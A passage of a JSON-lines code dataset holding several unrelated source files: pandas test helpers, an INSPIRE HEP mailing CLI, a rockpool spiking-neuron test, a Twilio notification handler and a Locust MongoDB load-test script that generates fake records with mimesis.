right, check_dtype=True,\n check_index_type=False,\n check_column_type=False,\n check_frame_type=False,\n check_less_precise=False,\n check_names=True):\n if check_frame_type:\n assert(type(left) == type(right))\n assert(isinstance(left, DataFrame))\n assert(isinstance(right, DataFrame))\n\n if check_less_precise:\n assert_almost_equal(left.columns,right.columns)\n assert_almost_equal(left.index,right.index)\n else:\n assert(left.columns.equals(right.columns))\n assert(left.index.equals(right.index))\n\n for i, col in enumerate(left.columns):\n assert(col in right)\n lcol = left.icol(i)\n rcol = right.icol(i)\n assert_series_equal(lcol, rcol,\n check_dtype=check_dtype,\n check_index_type=check_index_type,\n check_less_precise=check_less_precise)\n\n if check_index_type:\n assert(type(left.index) == type(right.index))\n assert(left.index.dtype == right.index.dtype)\n assert(left.index.inferred_type == right.index.inferred_type)\n if check_column_type:\n assert(type(left.columns) == type(right.columns))\n assert(left.columns.dtype == right.columns.dtype)\n assert(left.columns.inferred_type == right.columns.inferred_type)\n if check_names:\n assert(left.index.names == right.index.names)\n assert(left.columns.names == right.columns.names)\n\n\ndef assert_panel_equal(left, right,\n check_panel_type=False,\n check_less_precise=False):\n if check_panel_type:\n assert(type(left) == type(right))\n\n assert(left.items.equals(right.items))\n assert(left.major_axis.equals(right.major_axis))\n assert(left.minor_axis.equals(right.minor_axis))\n\n for col, series in left.iterkv():\n assert(col in right)\n assert_frame_equal(series, right[col], check_less_precise=check_less_precise, check_names=False) # TODO strangely check_names fails in py3 ?\n\n for col in right:\n assert(col in left)\n\n\ndef assert_panel4d_equal(left, right,\n check_less_precise=False):\n assert(left.labels.equals(right.labels))\n assert(left.items.equals(right.items))\n assert(left.major_axis.equals(right.major_axis))\n assert(left.minor_axis.equals(right.minor_axis))\n\n for col, series in left.iterkv():\n assert(col in right)\n assert_panel_equal(series, right[col], check_less_precise=check_less_precise)\n\n for col in right:\n assert(col in left)\n\n\ndef assert_contains_all(iterable, dic):\n for k in iterable:\n assert(k in dic)\n\n\ndef getCols(k):\n return string.ascii_uppercase[:k]\n\n\ndef makeStringIndex(k):\n return Index([rands(10) for _ in xrange(k)])\n\n\ndef makeUnicodeIndex(k):\n return Index([randu(10) for _ in xrange(k)])\n\n\ndef makeIntIndex(k):\n return Index(range(k))\n\n\ndef makeFloatIndex(k):\n values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)\n return Index(values * (10 ** np.random.randint(0, 9)))\n\n\ndef makeFloatSeries():\n index = makeStringIndex(N)\n return Series(randn(N), index=index)\n\n\ndef makeStringSeries():\n index = makeStringIndex(N)\n return Series(randn(N), index=index)\n\n\ndef makeObjectSeries():\n dateIndex = makeDateIndex(N)\n dateIndex = Index(dateIndex, dtype=object)\n index = makeStringIndex(N)\n return Series(dateIndex, index=index)\n\n\ndef getSeriesData():\n index = makeStringIndex(N)\n return dict((c, Series(randn(N), index=index)) for c in getCols(K))\n\n\ndef makeDataFrame():\n data = getSeriesData()\n return DataFrame(data)\n\n\ndef getArangeMat():\n return np.arange(N * K).reshape((N, K))\n\n\ndef getMixedTypeDict():\n index = Index(['a', 'b', 'c', 'd', 'e'])\n\n data = {\n 'A': [0., 1., 2., 3., 4.],\n 'B': [0., 1., 0., 1., 0.],\n 'C': ['foo1', 'foo2', 'foo3', 'foo4', 'foo5'],\n 'D': bdate_range('1/1/2009', periods=5)\n }\n\n return index, data\n\n\ndef makeDateIndex(k):\n dt = datetime(2000, 1, 1)\n dr = bdate_range(dt, periods=k)\n return DatetimeIndex(dr)\n\n\ndef makePeriodIndex(k):\n dt = datetime(2000, 1, 1)\n dr = PeriodIndex(start=dt, periods=k, freq='B')\n return dr\n\n\ndef makeTimeSeries(nper=None):\n if nper is None:\n nper = N\n return Series(randn(nper), index=makeDateIndex(nper))\n\n\ndef makePeriodSeries(nper=None):\n if nper is None:\n nper = N\n return Series(randn(nper), index=makePeriodIndex(nper))\n\n\ndef getTimeSeriesData(nper=None):\n return dict((c, makeTimeSeries(nper)) for c in getCols(K))\n\n\ndef makeTimeDataFrame(nper=None):\n data = getTimeSeriesData(nper)\n return DataFrame(data)\n\n\ndef getPeriodData():\n return dict((c, makePeriodSeries()) for c in getCols(K))\n\n\ndef makePeriodFrame():\n data = getPeriodData()\n return DataFrame(data)\n\n\ndef makePanel(nper=None):\n cols = ['Item' + c for c in string.ascii_uppercase[:K - 1]]\n data = dict((c, makeTimeDataFrame(nper)) for c in cols)\n return Panel.fromDict(data)\n\n\ndef makePanel4D(nper=None):\n return Panel4D(dict(l1=makePanel(nper), l2=makePanel(nper),\n l3=makePanel(nper)))\n\n\ndef makeCustomIndex(nentries, nlevels, prefix='#', names=False, ndupe_l=None,\n idx_type=None):\n \"\"\"Create an index/multindex with given dimensions, levels, names, etc'\n\n nentries - number of entries in index\n nlevels - number of levels (> 1 produces multindex)\n prefix - a string prefix for labels\n names - (Optional), bool or list of strings. if True will use default names,\n if false will use no names, if a list is given, the name of each level\n in the index will be taken from the list.\n ndupe_l - (Optional), list of ints, the number of rows for which the\n label will repeated at the corresponding level, you can specify just\n the first few, the rest will use the default ndupe_l of 1.\n len(ndupe_l) <= nlevels.\n idx_type - \"i\"/\"f\"/\"s\"/\"u\"/\"dt/\"p\".\n If idx_type is not None, `idx_nlevels` must be 1.\n \"i\"/\"f\" creates an integer/float index,\n \"s\"/\"u\" creates a string/unicode index\n \"dt\" create a datetime index.\n\n if unspecified, string labels will be generated.\n \"\"\"\n\n from pandas.util.compat import Counter\n if ndupe_l is None:\n ndupe_l = [1] * nlevels\n assert (_is_sequence(ndupe_l) and len(ndupe_l) <= nlevels)\n assert (names is None or names is False\n or names is True or len(names) is nlevels)\n assert idx_type is None or \\\n (idx_type in ('i', 'f', 's', 'u', 'dt', 'p') and nlevels == 1)\n\n if names is True:\n # build default names\n names = [prefix + str(i) for i in range(nlevels)]\n if names is False:\n # pass None to index constructor for no name\n names = None\n\n # make singelton case uniform\n if isinstance(names, basestring) and nlevels == 1:\n names = [names]\n\n # specific 1D index type requested?\n idx_func = dict(i=makeIntIndex, f=makeFloatIndex, s=makeStringIndex,\n u=makeUnicodeIndex, dt=makeDateIndex, p=makePeriodIndex).get(idx_type)\n if idx_func:\n idx = idx_func(nentries)\n # but we need to fill in the name\n if names:\n idx.name = names[0]\n return idx\n elif idx_type is not None:\n raise ValueError('\"%s\" is not a legal value for `idx_type`, use '\n '\"i\"/\"f\"/\"s\"/\"u\"/\"dt/\"p\".' % idx_type)\n\n if len(ndupe_l) < nlevels:\n ndupe_l.extend([1] * (nlevels - len(ndupe_l)))\n assert len(ndupe_l) == nlevels\n\n assert all([x > 0 for x in ndupe_l])\n\n tuples = []\n for i in range(nlevels):\n def keyfunc(x):\n import re\n numeric_tuple = re.sub(\"[^\\d_]_?\",\"\",x).split(\"_\")\n return map(int,numeric_tuple)\n\n # build a list of lists to create the index from\n div_factor = nentries // ndupe_l[i] + 1\n cnt = Counter()\n for j in range(div_factor):\n label = prefix + '_l%d_g' % i + str(j)\n cnt[label] = ndupe_l[i]\n # cute Counter trick\n result = list(sorted(cnt.elements(), key=keyfunc))[:nentries]\n tuples.append(result)\n\n tuples = zip(*tuples)\n\n # convert tuples to index\n if nentries == 1:\n index = Index(tuples[0], name=names[0])\n else:\n index = MultiIndex.from_tuples(tuples, names=names)\n return index\n\n\ndef makeCustomDataframe(nrows, ncols, c_idx_names=True, r_idx_names=True,\n c_idx_nlevels=1, r_idx_nlevels=1, data_gen_f=None,\n c_ndupe_l=None, r_ndupe_l=None, dtype=None,\n c_idx_type=None, r_idx_type=None):\n \"\"\"\n nrows, ncols - number of data rows/cols\n c_idx_names, idx_names - False/True/list of strings, yields No names ,\n default names or uses the provided names for the levels of the\n corresponding index. You can provide a single string when\n c_idx_nlevels ==1.\n c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex\n r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex\n data_gen_f - a function f(row,col) which return the data value at that position,\n the default generator used yields values of the form \"RxCy\" based on position.\n c_ndupe_l, r_ndupe_l - list of integers, determines the number\n of duplicates for each label at a given level of the corresponding index.\n The default `None` value produces a multiplicity of 1 across\n all levels, i.e. a unique index. Will accept a partial list of\n length N < idx_nlevels, for just the first N levels. If ndupe\n doesn't divide nrows/ncol, the last label might have lower multiplicity.\n dtype - passed to the DataFrame constructor as is, in case you wish to\n have more control in conjuncion with a custom `data_gen_f`\n r_idx_type, c_idx_type - \"i\"/\"f\"/\"s\"/\"u\"/\"dt\".\n If idx_type is not None, `idx_nlevels` must be 1.\n \"i\"/\"f\" creates an integer/float index,\n \"s\"/\"u\" creates a string/unicode index\n \"dt\" create a datetime index.\n\n if unspecified, string labels will be generated.\n\n Examples:\n\n # 5 row, 3 columns, default names on both, single index on both axis\n >> makeCustomDataframe(5,3)\n\n # make the data a random int between 1 and 100\n >> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))\n\n # 2-level multiindex on rows with each label duplicated twice on first level,\n # default names on both axis, single index on both axis\n >> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])\n\n # DatetimeIndex on row, index with unicode labels on columns\n # no names on either axis\n >> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,\n r_idx_type=\"dt\",c_idx_type=\"u\")\n\n # 4-level multindex on rows with names provided, 2-level multindex\n # on columns with default labels and default names.\n >> a=makeCustomDataframe(5,3,r_idx_nlevels=4,\n r_idx_names=[\"FEE\",\"FI\",\"FO\",\"FAM\"],\n c_idx_nlevels=2)\n\n >> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)\n \"\"\"\n\n assert c_idx_nlevels > 0\n assert r_idx_nlevels > 0\n assert r_idx_type is None or \\\n (r_idx_type in ('i', 'f', 's', 'u', 'dt', 'p') and r_idx_nlevels == 1)\n assert c_idx_type is None or \\\n (c_idx_type in ('i', 'f', 's', 'u', 'dt', 'p') and c_idx_nlevels == 1)\n\n columns = makeCustomIndex(ncols, nlevels=c_idx_nlevels, prefix='C',\n names=c_idx_names, ndupe_l=c_ndupe_l,\n idx_type=c_idx_type)\n index = makeCustomIndex(nrows, nlevels=r_idx_nlevels, prefix='R',\n names=r_idx_names, ndupe_l=r_ndupe_l,\n idx_type=r_idx_type)\n\n # by default, generate data based on location\n if data_gen_f is None:\n data_gen_f = lambda r, c: \"R%dC%d\" % (r, c)\n\n data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]\n\n return DataFrame(data, index, columns, dtype=dtype)\n\n\ndef add_nans(panel):\n I, J, N = panel.shape\n for i, item in enumerate(panel.items):\n dm = panel[item]\n for j, col in enumerate(dm.columns):\n dm[col][:i + j] = np.NaN\n\n\ndef add_nans_panel4d(panel4d):\n for l, label in enumerate(panel4d.labels):\n panel = panel4d[label]\n add_nans(panel)\n\n\nclass TestSubDict(dict):\n def __init__(self, *args, **kwargs):\n dict.__init__(self, *args, **kwargs)\n\n\n# Dependency checks. Copied this from Nipy/Nipype (Copyright of\n# respective developers, license: BSD-3)\ndef package_check(pkg_name, version=None, app='pandas', checker=LooseVersion,\n exc_failed_import=ImportError,\n exc_failed_check=RuntimeError):\n \"\"\"Check that the minimal version of the required package is installed.\n\n Parameters\n ----------\n pkg_name : string\n Name of the required package.\n version : string, optional\n Minimal version number for required package.\n app : string, optional\n Application that is performing the check. For instance, the\n name of the tutorial being executed that depends on specific\n packages.\n checker : object, optional\n The class that will perform the version checking. Default is\n distutils.version.LooseVersion.\n exc_failed_import : Exception, optional\n Class of the exception to be thrown if import failed.\n exc_failed_check : Exception, optional\n Class of the exception to be thrown if version check failed.\n\n Examples\n --------\n package_check('numpy', '1.3')\n package_check('networkx', '1.0', 'tutorial1')\n\n \"\"\"\n\n if app:\n msg = '%s requires %s' % (app, pkg_name)\n else:\n msg = 'module requires %s' % pkg_name\n if version:\n msg += ' with version >= %s' % (version,)\n try:\n mod = __import__(pkg_name)\n except ImportError:\n raise exc_failed_import(msg)\n if not version:\n return\n try:\n have_version = mod.__version__\n except AttributeError:\n raise exc_failed_check('Cannot find version for %s' % pkg_name)\n if checker(have_version) < checker(version):\n raise exc_failed_check(msg)\n\n\ndef skip_if_no_package(*args, **kwargs):\n \"\"\"Raise SkipTest if package_check fails\n\n Parameters\n ----------\n *args Positional parameters passed to `package_check`\n *kwargs Keyword parameters passed to `package_check`\n \"\"\"\n from nose import SkipTest\n package_check(exc_failed_import=SkipTest,\n exc_failed_check=SkipTest,\n *args, **kwargs)\n\n#\n# Additional tags decorators for nose\n#\n\n\ndef network(t):\n \"\"\"\n Label a test as requiring network connection.\n\n In some cases it is not possible to assume network presence (e.g. Debian\n build hosts).\n\n Parameters\n ----------\n t : callable\n The test requiring network connectivity.\n\n Returns\n -------\n t : callable\n The decorated test `t`.\n\n Examples\n --------\n A test can be decorated as requiring network like this::\n\n from pandas.util.testing import *\n\n @network\n def test_network(self):\n print 'Fetch the stars from http://'\n\n And use ``nosetests -a '!network'`` to exclude running tests requiring\n network connectivity.\n \"\"\"\n\n t.network = True\n return t\n\n\nclass SimpleMock(object):\n \"\"\"\n Poor man's mocking object\n\n Note: only works for new-style classes, assumes __getattribute__ exists.\n\n >>> a = type(\"Duck\",(),{})\n >>> a.attr1,a.attr2 =\"fizz\",\"buzz\"\n >>> b = SimpleMock(a,\"attr1\",\"bar\")\n >>> b.attr1 == \"bar\" and b.attr2 == \"buzz\"\n True\n >>> a.attr1 == \"fizz\" and a.attr2 == \"buzz\"\n True\n \"\"\"\n def __init__(self, obj, *args, **kwds):\n assert(len(args) % 2 == 0)\n attrs = kwds.get(\"attrs\", {})\n for k, v in zip(args[::2], args[1::2]):\n # dict comprehensions break 2.6\n attrs[k] = v\n self.attrs = attrs\n self.obj = obj\n\n def __getattribute__(self, name):\n attrs = object.__getattribute__(self, \"attrs\")\n obj = object.__getattribute__(self, \"obj\")\n return attrs.get(name, type(obj).__getattribute__(obj, name))\n\n\n@contextmanager\ndef stdin_encoding(encoding=None):\n \"\"\"\n Context manager for running bits of code while emulating an arbitrary\n stdin encoding.\n\n >>> import sys\n >>> _encoding = sys.stdin.encoding\n >>> with stdin_encoding('AES'): sys.stdin.encoding\n 'AES'\n >>> sys.stdin.encoding==_encoding\n True\n\n \"\"\"\n import sys\n _stdin = sys.stdin\n sys.stdin = SimpleMock(sys.stdin, \"encoding\", encoding)\n yield\n sys.stdin = _stdin\n","repo_name":"miniBloq/v0.83","sub_path":"source/Bin/Minibloq/lang/PPythonWin/v2.7.5.1/App/Lib/site-packages/pandas/util/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":22877,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"3"}
+{"seq_id":"41024698298","text":"import click\nimport structlog\nfrom flask.cli import with_appcontext\n\nfrom inspirehep.mailing.api.jobs import (\n get_jobs_from_last_week,\n get_jobs_weekly_html_content,\n)\nfrom inspirehep.mailing.providers.mailtrain import (\n mailtrain_update_weekly_campaign_content,\n)\n\nLOGGER = structlog.getLogger()\n\n\n@click.group()\ndef mailing():\n \"\"\"Command to handle mailing.\"\"\"\n\n\n@mailing.command(\n help=\"Updates the Atom feed for the weekly campaign with the INSPIRE jobs posted last week.\"\n)\n@with_appcontext\ndef update_weekly_jobs():\n click.secho(\"Searching for jobs posted last week\")\n jobs = get_jobs_from_last_week()\n if not jobs:\n click.secho(\"No jobs found from last week skipping...\", fg=\"red\")\n return\n\n click.secho(f\"Found {len(jobs)} job records from last week.\", fg=\"green\")\n\n content = get_jobs_weekly_html_content(jobs)\n if not mailtrain_update_weekly_campaign_content(content):\n click.secho(\"There was a problem with updating Atom Feed\")\n exit(1)\n\n click.secho(\"Campaign updated.\", fg=\"green\")\n","repo_name":"inspirehep/inspirehep","sub_path":"backend/inspirehep/mailing/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"}
+{"seq_id":"40796820327","text":"import pytest\n\npytest.importorskip(\"torch\")\npytest.importorskip(\"sinabs.exodus\")\n\n\ndef test_spike_clipping():\n from rockpool.nn.modules.torch.lif_torch import StepPWL, PeriodicExponential\n from rockpool.nn.modules.torch import LIFBitshiftTorch\n from rockpool.nn.modules import LIFTorch\n import torch\n\n max_spikes_per_dt = 31\n\n n_synapses = 5\n n_neurons = 10\n n_batches = 3\n T = 40\n tau_mem = torch.rand(n_neurons)\n tau_syn = 0.05\n threshold = 1.34\n\n # - Test maximal initialisation\n mod_xylo_step = LIFTorch(\n shape=(n_synapses * n_neurons, n_neurons),\n tau_mem=tau_mem,\n tau_syn=tau_syn,\n has_rec=False,\n dt=1e-3,\n noise_std=0.0,\n spike_generation_fn=StepPWL,\n threshold=threshold,\n max_spikes_per_dt=max_spikes_per_dt,\n )\n mod_xylo_periodic = LIFTorch(\n shape=(n_synapses * n_neurons, n_neurons),\n tau_mem=tau_mem,\n tau_syn=tau_syn,\n has_rec=False,\n dt=1e-3,\n noise_std=0.0,\n spike_generation_fn=PeriodicExponential,\n threshold=threshold,\n max_spikes_per_dt=max_spikes_per_dt,\n )\n mod = LIFTorch(\n shape=(n_synapses * n_neurons, n_neurons),\n tau_mem=tau_mem,\n tau_syn=tau_syn,\n has_rec=False,\n dt=1e-3,\n noise_std=0.0,\n threshold=threshold,\n )\n mod_bitshift = LIFBitshiftTorch(\n shape=(n_synapses * n_neurons, n_neurons),\n tau_mem=tau_mem,\n tau_syn=tau_syn,\n has_rec=False,\n dt=1e-3,\n noise_std=0.0,\n threshold=threshold,\n )\n\n # - Generate some data\n input_data = 0.5 * torch.ones(n_batches, T, n_synapses * n_neurons)\n\n # - test that number of spikes does not exceed 15\n out, _, rd = mod(input_data, record=True)\n out_xylo_step, _, rd_xylo_step = mod_xylo_step(input_data, record=True)\n out_xylo_periodic, _, _ = mod_xylo_periodic(input_data, record=True)\n # - test default gradient of xylo\n out_bitshift, _, _ = mod_bitshift(input_data, record=True)\n\n assert torch.any(\n out > max_spikes_per_dt\n ), \"Test not possible: No time-points where neurons produced more than spike limit\"\n assert torch.all(\n out_xylo_step <= max_spikes_per_dt\n ), \"Some time-steps had too many events\"\n assert torch.all(\n out_xylo_periodic <= max_spikes_per_dt\n ), \"Some time-steps had too many events\"\n assert torch.all(\n out_bitshift <= max_spikes_per_dt\n ), \"Some time-steps had too many events\"\n\n # - test that membrane potential is not reset entirely when spikes are clipped\n batch = 0\n neuron = 0\n\n t_spike = torch.where(out[batch, :, neuron] > max_spikes_per_dt)[0][0]\n vmem = rd[\"vmem\"][batch, :, neuron]\n vmem_xylo_step = rd_xylo_step[\"vmem\"][batch, :, neuron]\n spike_diff = (\n out[batch, : t_spike + 1, neuron] - out_xylo_step[batch, : t_spike + 1, neuron]\n )\n assert torch.allclose(\n vmem[: t_spike + 1], vmem_xylo_step[: t_spike + 1] - spike_diff * threshold\n )\n\n if torch.cuda.is_available():\n from rockpool.nn.modules import LIFExodus\n\n mod_slayer = LIFExodus(\n shape=(n_synapses * n_neurons, n_neurons),\n tau_mem=tau_mem[0].item(),\n tau_syn=tau_syn,\n has_rec=False,\n dt=1e-3,\n noise_std=0.0,\n threshold=threshold,\n ).cuda()\n mod_slayer_xylo = LIFExodus(\n shape=(n_synapses * n_neurons, n_neurons),\n tau_mem=tau_mem[0].item(),\n tau_syn=tau_syn,\n has_rec=False,\n dt=1e-3,\n noise_std=0.0,\n threshold=threshold,\n max_spikes_per_dt=max_spikes_per_dt,\n ).cuda()\n\n out_slayer, _, rd_slayer = mod_slayer(input_data.cuda(), record=True)\n out_slayer_xylo, _, rd_slayer_xylo = mod_slayer_xylo(\n input_data.cuda(), record=True\n )\n\n assert torch.any(\n out_slayer > max_spikes_per_dt\n ), \"Test not possible: No time-points where neurons produced more than spike limit\"\n assert torch.all(\n out_slayer_xylo <= max_spikes_per_dt\n ), \"Some time-steps had too many events\"\n\n t_spike = torch.where(out_slayer[batch, :, neuron] > 15)[0][0]\n vmem = rd_slayer[\"vmem\"][batch, :, neuron]\n vmem_slayer_xylo = rd_slayer_xylo[\"vmem\"][batch, :, neuron]\n spike_diff = (\n out_slayer[batch, : t_spike + 1, neuron]\n - out_slayer_xylo[batch, : t_spike + 1, neuron]\n )\n assert torch.allclose(\n vmem[: t_spike + 1],\n vmem_slayer_xylo[: t_spike + 1] - spike_diff * threshold,\n )\n","repo_name":"synsense/rockpool","sub_path":"tests/tests_default/test_surrogate_gradients.py","file_name":"test_surrogate_gradients.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"3"}
+{"seq_id":"41069067162","text":"from twilio.rest import Client\nimport os\n\nclass TwilioHandler:\n def __init__(self,parent):\n self.account_sid =os.environ.get(\"hoi_t_account_sid\")\n self.auth_token = os.environ.get(\"hoi_t_auth_token\")\n self.phone_number = os.environ.get(\"hoi_t_phone_number\")\n self.client = Client(self.account_sid, self.auth_token)\n self.parent = parent\n\n def send_notification(self,body,to):\n try:\n self.client.messages.create(\n body=body,\n from_=self.phone_number,\n to= to)\n self.parent.console_logger.log_generic_row(f\"Sending Notification to {to}!\",\"green\")\n except:\n pass\n \n def send_notifications_to_all(self,message):\n contacts = self.parent.contacts.keys()\n for contact in contacts:\n self.send_notification(message,self.parent.contacts[contact])\n self.parent.console_logger.log_generic_row(\"Sent all contacts a notification!\",\"green\")","repo_name":"House-of-IoT/HOI-GeneralServer","sub_path":"ThirdPartyHandlers/twilio_handler.py","file_name":"twilio_handler.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"1868041646","text":"#!/usr/bin/env python\n\n########################################################################\n#\n# Recommended Usage:\n# Users: 1 * workers\n# Host: srv|db|coll|bulksize\n#\n########################################################################\n\n########################################################################\n#\n# Many of you like to get fancy by creating separate object classes\n# and external file dependencies, e.g. json files, \n# I discourage you from doing that because there are file path\n# reference issues that make things difficult when you containerize\n# and deploy to gke. Try to keep everything in this 1 file.\n# The only exception to this rule are faker models which need to be\n# pre-built and tested and checked in.\n#\n########################################################################\n\n# Allows us to make many pymongo requests in parallel to overcome the single threaded problem\nimport gevent\n_ = gevent.monkey.patch_all()\n\n########################################################################\n# Add any additional imports here.\n# But make sure to include in requirements.txt\n########################################################################\nimport pymongo\nfrom bson import json_util\nfrom bson.json_util import loads\nfrom bson import ObjectId\nfrom locust import User, events, task, constant, tag, between\nimport time\nfrom pickle import TRUE\nfrom datetime import datetime, timedelta\nimport random\nfrom bson.decimal128 import Decimal128\nfrom decimal import Decimal\nimport string\nfrom mimesis import Person\nfrom mimesis.locales import Locale\nfrom mimesis.enums import Gender\nfrom mimesis import Address\nfrom mimesis import Generic\nfrom mimesis.schema import Field, Schema\n\n# mimesis schema for bulk creation\n# Note that increment doesn't maintain unique sequence numbers if you are running multiple mlocust users in parallel\n# Not every api func has been used. The full api can be found here. https://mimesis.name/en/master/api.html\n# TODO Only use what you need. The more logic you have the slower your schema generation will be.\n_ = Field(locale=Locale.EN)\nschema = Schema(schema=lambda: {\n \"pk\": _(\"increment\"),\n \"uid\": _(\"uuid\"),\n \"customCode\": _(\"random.custom_code\", mask=\"@###\", char=\"@\", digit=\"#\"),\n \"genStr\": _(\"random.generate_string\", str_seq=\"abcdefg123456789\", length=8),\n \"randintArray\": _(\"random.randints\", amount=3, a=1, b=10000),\n \"randstr\": _(\"random.randstr\", unique=False, length=10),\n \"uniform\": _(\"random.uniform\", a=1.2, b=4.5, precision=10),\n \"randomBytes\": _(\"random.urandom\", size=4),\n \"address\": {\n \"addr\": _(\"address.address\"),\n \"callingCode\": _(\"address.calling_code\"),\n \"city\": _(\"address.city\"),\n \"continent\": _(\"address.continent\"),\n \"coords\": _(\"address.coordinates\"),\n \"country\": _(\"address.country\"),\n \"countryCd\": _(\"address.country_code\"),\n \"federalSubj\": _(\"address.federal_subject\"),\n \"lat\": _(\"address.latitude\"),\n \"lng\": _(\"address.longitude\"),\n \"postalCd\": _(\"address.postal_code\"),\n \"prefecture\": _(\"address.prefecture\"),\n \"province\": _(\"address.province\"),\n \"region\": _(\"address.region\"),\n \"state\": _(\"address.state\", abbr=False),\n \"streetNm\": _(\"address.street_name\"),\n \"streetNum\": _(\"address.street_number\", maximum=2999),\n \"streetSuffix\": _(\"address.street_suffix\"),\n \"zip\": _(\"address.zip_code\")\n },\n \"finance\": {\n \"company\": _(\"finance.company\"),\n \"companyType\": _(\"finance.company_type\", abbr=False),\n \"price\": _(\"finance.price\", minimum=10, maximum=1000),\n \"stockNm\": _(\"finance.stock_name\"),\n \"stockTicker\": _(\"finance.stock_ticker\")\n },\n \"payment\": {\n \"cid\": _(\"payment.cid\"),\n \"cvv\": _(\"payment.cvv\"),\n \"expDt\": _(\"payment.credit_card_expiration_date\", minimum=16, maximum=25),\n \"ccNetwork\": _(\"payment.credit_card_network\"),\n \"ccNum\": _(\"payment.credit_card_number\")\n },\n \"ts\": _(\"datetime.datetime\", start=2000, end=2023),\n \"formattedDt\": _(\"datetime.formatted_date\", fmt=\"%Y-%m-%d\"),\n \"month\": _(\"datetime.month\", abbr=False),\n \"year\": _(\"datetime.year\", minimum=1990, maximum=2023),\n \"food\": {\n \"dish\": _(\"food.dish\"),\n \"drink\": _(\"food.drink\"),\n \"fruit\": _(\"food.fruit\")\n },\n \"text\": {\n \"alphabet\": _(\"text.alphabet\", lower_case=False),\n \"answer\": _(\"text.answer\"),\n \"color\": _(\"text.color\"),\n \"hexColor\": _(\"text.hex_color\"),\n \"level\": _(\"text.level\"),\n \"quote\": _(\"text.quote\"),\n \"sentence\": _(\"text.sentence\"),\n \"paragraph\": _(\"text.text\", quantity=3),\n \"title\": _(\"text.title\"),\n \"word\": _(\"text.word\"),\n \"wordArray\": _(\"text.words\", quantity=3),\n },\n \"code\": {\n \"imei\": _(\"code.imei\"),\n \"isbn\": _(\"code.isbn\"),\n \"issn\": _(\"code.issn\", mask=\"###-##-####\"),\n \"pin\": _(\"code.pin\", mask=\"####\"),\n },\n \"hash\": _(\"cryptographic.hash\"),\n \"bool\": _(\"boolean\"),\n \"dsn\": _(\"dsn\"),\n \"os\": _(\"os\"),\n \"progLang\": _(\"programming_language\"),\n \"version\": _(\"version\", pre_release=True),\n \"timestamp\": _(\"timestamp\", posix=False),\n \"numeric\": {\n \"int\": _(\"numeric.integer_number\", start=-1000, end=1000),\n \"intArray\": _(\"numeric.integers\", start=-1000, end=1000, n=5),\n \"float\": _(\"numeric.float_number\", start=-1000.0, end=1000.0, precision=7),\n \"floatArray\": _(\"numeric.floats\", start=-1000.0, end=1000.0, n=5, precision=7),\n },\n \"internet\": {\n \"content_type\": _(\"internet.content_type\"),\n \"emoji\": _(\"internet.emoji\"),\n \"hashtagArray\": _(\"internet.hashtags\", quantity=3),\n \"hostname\": _(\"internet.hostname\"),\n \"httpMethod\": _(\"internet.http_method\"),\n \"httpStatusCd\": _(\"internet.http_status_code\"),\n \"httpStatusMsg\": _(\"internet.http_status_message\"),\n \"ipv4\": _(\"internet.ip_v4_with_port\"),\n \"ipv6\": _(\"internet.ip_v6\"),\n \"macAddr\": _(\"internet.mac_address\"),\n \"port\": _(\"internet.port\"),\n \"publicDns\": _(\"internet.public_dns\"),\n \"queryParams\": _(\"internet.query_parameters\", length=3),\n \"queryString\": _(\"internet.query_string\", length=3),\n \"uri\": _(\"internet.uri\"),\n \"url\": _(\"internet.url\"),\n \"userAgent\": _(\"internet.user_agent\")\n },\n \"file\": {\n \"nm\": _(\"file.file_name\"),\n \"ext\": _(\"file.extension\"),\n \"size\": _(\"file.size\", minimum=1, maximum=100)\n },\n \"owner\": {\n \"name\": _(\"person.name\"),\n \"first\": _(\"person.first_name\"),\n \"last\": _(\"person.last_name\"),\n \"gender\": _(\"person.gender\"),\n \"nationality\": _(\"person.nationality\"),\n \"title\": _(\"person.title\"),\n \"occupation\": _(\"person.occupation\"),\n \"lang\": _(\"person.language\"),\n \"phone\": _(\"person.telephone\"),\n \"height\": _(\"person.height\", minimum=1.5, maximum=2),\n \"weight\": _(\"person.weight\", minimum=38, maximum=90),\n \"email\": _(\"person.email\", key=str.lower),\n \"username\": _(\"person.username\"),\n \"password\": _(\"person.password\"),\n \"token\": _(\"token_hex\"),\n \"creator\": _(\"full_name\", gender=Gender.FEMALE),\n },\n})\n\n########################################################################\n# Even though locust is designed for concurrency of simulated users,\n# given how resource intensive fakers/bulk inserts are,\n# you should only run 1 simulated user / worker else you'll kill the \n# CPU of the workers.\n########################################################################\nclass MetricsLocust(User):\n ########################################################################\n # Class variables. The values are initialized with None\n # till they get set from the actual locust exeuction \n # when the host param is passed in.\n # DO NOT MODIFY! PASS IN VIA HOST PARAM.\n ########################################################################\n # DO NOT MODIFY! PASS IN VIA HOST PARAM.\n client, coll, audit, bulk_size = None, None, None, None\n\n global schema\n\n ####################################################################\n # Unlike a standard locust file where we throttle requests on a per\n # second basis, since we are trying to load data asap, there will \n # be no throttling\n ####################################################################\n\n def __init__(self, parent):\n super().__init__(parent)\n\n # We can't put this in the singleton because we can't modify the params after it's been run once, \n # e.g. run new test with a different host param\n # Parse out env variables from the host\n vars = self.host.split(\"|\")\n srv = vars[0]\n print(\"SRV:\",srv)\n self.client = pymongo.MongoClient(srv)\n\n db = self.client[vars[1]]\n self.coll = db[vars[2]]\n\n # docs to insert per batch insert\n self.bulk_size = int(vars[3])\n print(\"Batch size from Host:\",self.bulk_size)\n\n schema.create(iterations=self.bulk_size)\n\n # Singleton\n if (self.audit is None):\n # Log all application exceptions (and audits) to the same cluster\n self.audit = self.client.mlocust.audit\n\n ################################################################\n # Example helper function that is not a Locust task.\n # All Locust tasks require the @task annotation\n # You have to 